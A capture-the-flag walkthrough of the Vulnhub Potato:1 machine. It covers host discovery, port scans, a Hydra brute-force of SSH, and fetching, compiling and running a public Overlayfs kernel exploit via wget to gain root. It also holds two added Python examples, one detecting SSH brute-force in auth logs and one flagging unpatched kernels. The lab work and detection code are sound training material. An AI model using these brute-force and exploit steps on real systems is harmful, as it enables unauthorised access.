POTATO 1: VULNHUB WALKTHROUGH

Clear InfoSec
4 min read · Jan 7, 2021

Today, let us crack the Potato:1 Machine from Vulnhub.

You can download the machine from here.

  • Difficulty: Easy to Medium
  • Goal: Get to the root shell, i.e. (root@localhost:~#), and then obtain the flag under /root.

We will follow the Penetration Testing Execution Standard (PTES) for cracking the machine.

Let us start by gathering information about the machine. First, we should find the IP address assigned to the vulnerable machine.

Netdiscover is an ARP scanner used to identify live hosts on a network.

kali@kali:~$ sudo netdiscover

We thus found the IP address of the machine, which is 192.168.70.130. Now, we must run an Nmap scan to find out which ports are open on the machine and which services they run.

[Nmap scan is also a part of Information Gathering]

kali@kali:~$ sudo nmap -sSV -vv -sC -T4 -p- <ip address>

With that, we did a full port scan and found that the machine has 2 open ports, which are 80 & 7120. We can now try to connect to both ports to find any vulnerabilities.

As we could not find anything of interest on port 80 when opened in a browser, we can move to port 7120, where an SSH service is listening, in search of vulnerabilities.

This stage is known as Vulnerability Analysis in PTES.

We can now open the Nikto tool and run a quick scan on the target IP address.

kali@kali:~$ nikto -h <ip address>

No luck!! We cannot find any vulnerability here, either. So, we can now try to brute-force the SSH service on port 7120. To brute-force and crack the SSH credentials, we can use the powerful tool THC-Hydra.

kali@kali:~$ hydra -s 7120 -l potato -P /home/kali/Desktop/passlist.txt ssh://<ip address>

As you can see in the image above, using root as the username fails repeatedly. This is where the machine description provided by Vulnhub comes into play: we saw the VM name as Potato there.

So, when we try potato instead of root as the username, BOOM!! We got the password.

To be clear, we did not use the rockyou password list that is available on the Kali machine by default. Instead, we used Daniel Miessler's password list, and we highly recommend it, as it is our personal favorite.
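Seen from the target's side, the Hydra run above leaves a very recognisable trail in the SSH daemon's auth log: a burst of failed password attempts from one source address, a switch of usernames, and finally an accepted login for the account that was guessed. The following Python detector is an added example, not code from the walkthrough; the auth.log lines it parses are constructed to mirror the attempt sequence described above (root failing, then potato succeeding), and the threshold and window values are assumptions you would tune for your own environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of OpenSSH auth.log lines (not captured from the real machine).
# One source address hammers root, tries admin, switches to potato and gets in;
# a second address shows a single typo followed by a normal login and must not be flagged.
SAMPLE_AUTH_LOG = """\
Jan  7 10:15:01 ubuntu sshd[1201]: Failed password for root from 192.168.70.128 port 51022 ssh2
Jan  7 10:15:02 ubuntu sshd[1203]: Failed password for root from 192.168.70.128 port 51024 ssh2
Jan  7 10:15:02 ubuntu sshd[1205]: Failed password for root from 192.168.70.128 port 51026 ssh2
Jan  7 10:15:03 ubuntu sshd[1207]: Failed password for root from 192.168.70.128 port 51028 ssh2
Jan  7 10:15:04 ubuntu sshd[1209]: Failed password for invalid user admin from 192.168.70.128 port 51030 ssh2
Jan  7 10:15:06 ubuntu sshd[1211]: Failed password for potato from 192.168.70.128 port 51032 ssh2
Jan  7 10:15:07 ubuntu sshd[1213]: Failed password for potato from 192.168.70.128 port 51034 ssh2
Jan  7 10:15:09 ubuntu sshd[1215]: Accepted password for potato from 192.168.70.128 port 51036 ssh2
Jan  7 10:20:00 ubuntu sshd[1300]: Failed password for potato from 192.168.70.1 port 40000 ssh2
Jan  7 10:21:00 ubuntu sshd[1302]: Accepted password for potato from 192.168.70.1 port 40002 ssh2
"""

# OpenSSH writes "Failed password for [invalid user ]<user> from <ip> port <n> ssh2"
# and "Accepted password for <user> from <ip> port <n> ssh2".
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_auth_log(text, year=2021):
    """Turn auth.log text into a time-ordered list of login events.

    Syslog timestamps carry no year, so the caller supplies one (assumed 2021 here).
    Lines that are not password-authentication results are ignored.
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]})
    events.sort(key=lambda e: e["ts"])
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag source addresses with >= threshold failures inside any `window`.

    For each flagged address the finding lists the usernames tried and, if a
    login was accepted after the failures began, the account that was guessed.
    """
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = []
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e["result"] == "Failed"]
        # Sliding window over the (sorted) failure timestamps: largest burst seen.
        burst, start = 0, 0
        for end in range(len(failures)):
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            burst = max(burst, end - start + 1)
        if burst < threshold:
            continue

        first_failure = failures[0]["ts"]
        accepted = [e for e in evs if e["result"] == "Accepted" and e["ts"] >= first_failure]
        findings.append({
            "ip": ip,
            "failures": len(failures),
            "usernames": sorted({e["user"] for e in failures}),
            "success_as": accepted[0]["user"] if accepted else None,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(finding)
```

The "success_as" field is the part worth alerting on with the highest priority: a failure burst alone means someone is guessing, but a burst followed by an accepted login from the same address means a guess landed and the account needs its password rotated and its session reviewed. Moving SSH to a non-standard port such as 7120, as this VM does, changes nothing about this log trail.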

kali@kali:~$ ssh potato@<ip address> -p 7120

Here, we have only limited access. We also found out that the system runs Ubuntu Linux with kernel version 3.13.0.24 generic.

Now we move to the Exploitation phase of PTES.

A quick search on Google or Exploit-DB will do the trick. From the results, we can use the Overlayfs local privilege escalation exploit, which affects several Ubuntu kernel versions. You can find the exploit code here.

Download the file and save it as 37292.c; we will compile the exploit code with gcc on the target.

Now we can use Python's SimpleHTTPServer module to start a quick web server that hosts the exploit code.

kali@kali:~/Desktop$ sudo python -m SimpleHTTPServer 80

Open a new terminal and use wget to verify that the exploit code can be fetched from the web server.

kali@kali:~/Desktop$ wget http://<your ip address>:80/37292.c

Now we are at the Final stage…!!

Now, we must download the exploit code to the target machine: use the same wget command to fetch the file from the web server. But before that, make sure you have changed directory to /tmp.

potato@ubuntu:~$ cd /tmp

Check that the downloaded exploit code is present using the ls command, then compile it with gcc to exploit the vulnerability we found.

potato@ubuntu:/tmp$ gcc 37292.c -o 37292

If you get the results shown in the image, then the exploit code has executed successfully. Upon checking, we can see that we now have root privileges and can execute any command.
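On the defending side, the whole of this privilege-escalation stage hinges on one fact: the target is running a kernel that predates the fix for the Overlayfs bug. The check below is an added Python example, not code from the walkthrough or from the exploit, that parses Ubuntu kernel strings in both the `uname -r` form seen on the target (3.13.0-24-generic) and the dpkg package-version form, and reports which hosts in a constructed inventory still need the patch. The FIXED_ABI value is a placeholder that must be replaced with the ABI number named in your vendor's advisory for this issue; the point of the example is the numeric comparison and the "unknown series" outcome, which avoids a false "patched" verdict for kernels the rule was never written for.

```python
import re

# PLACEHOLDER (assumption): the first 3.13.0 ABI carrying the Overlayfs fix.
# Replace with the value from the vendor advisory before relying on this check.
FIXED_ABI = (3, 13, 0, 55)

# Matches "3.13.0-24-generic", "3.13.0-24-lowlatency" and package versions
# such as "3.13.0-55.92" (ABI number, optional upload number, optional flavour).
KERNEL_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)-(?P<abi>\d+)"
    r"(?:\.(?P<upload>\d+))?(?:-(?P<flavour>[A-Za-z0-9-]+))?$"
)


def parse_kernel(release):
    """Return (major, minor, patch, abi) as integers so comparisons are numeric.

    A string comparison would rank "3.13.0-100" below "3.13.0-24"; the tuple
    form gets this right. Unrecognised strings raise ValueError rather than
    silently passing as patched.
    """
    m = KERNEL_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel string: {release!r}")
    return (int(m["major"]), int(m["minor"]), int(m["patch"]), int(m["abi"]))


def patch_status(release, fixed=FIXED_ABI):
    """Classify one kernel as 'affected', 'patched' or 'unknown'.

    'unknown' is returned when the upstream series differs from the one the
    fixed ABI describes (for example an HWE 3.16 kernel on 14.04): that series
    has its own advisory and must be checked against its own fixed ABI.
    """
    version = parse_kernel(release)
    if version[:3] != fixed[:3]:
        return "unknown"
    return "affected" if version[3] < fixed[3] else "patched"


def sweep(inventory, fixed=FIXED_ABI):
    """Return {host: status} for every host that is not confirmed patched."""
    report = {}
    for host, release in inventory.items():
        status = patch_status(release, fixed)
        if status != "patched":
            report[host] = status
    return report


# Constructed inventory for the example; only the first entry mirrors the
# kernel string reported by the walkthrough's target.
INVENTORY = {
    "potato": "3.13.0-24-generic",    # the VM from the walkthrough
    "web01": "3.13.0-100-generic",    # newer ABI; lexically "100" < "24", numerically patched
    "db01": "3.13.0-55.92",           # dpkg package-version form, at the placeholder fix level
    "hwe01": "3.16.0-77-generic",     # different upstream series, needs its own advisory
}

if __name__ == "__main__":
    for host, status in sweep(INVENTORY).items():
        print(f"{host}: {status}")
```

In practice the inventory would come from your configuration-management or asset data rather than a literal dictionary, but the classification logic is the same: an exact series match with a lower ABI is the only case you may call "affected", and anything outside the series must be escalated rather than assumed safe.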

We can now find the hidden flag and finish the task.

Change the directory to /root and use the ls command to see all the files available in the /root folder.

In the listing, you will find a file named proof.txt, which contains the flag. Task completed.

Written by: Sunand M. (Information Security Researcher, Clear Infosec)


Clear InfoSec

Clear InfoSec is the subsidiary of Ana-Data Consulting Inc. that provides Information Security Services to help organizations improve their security posture.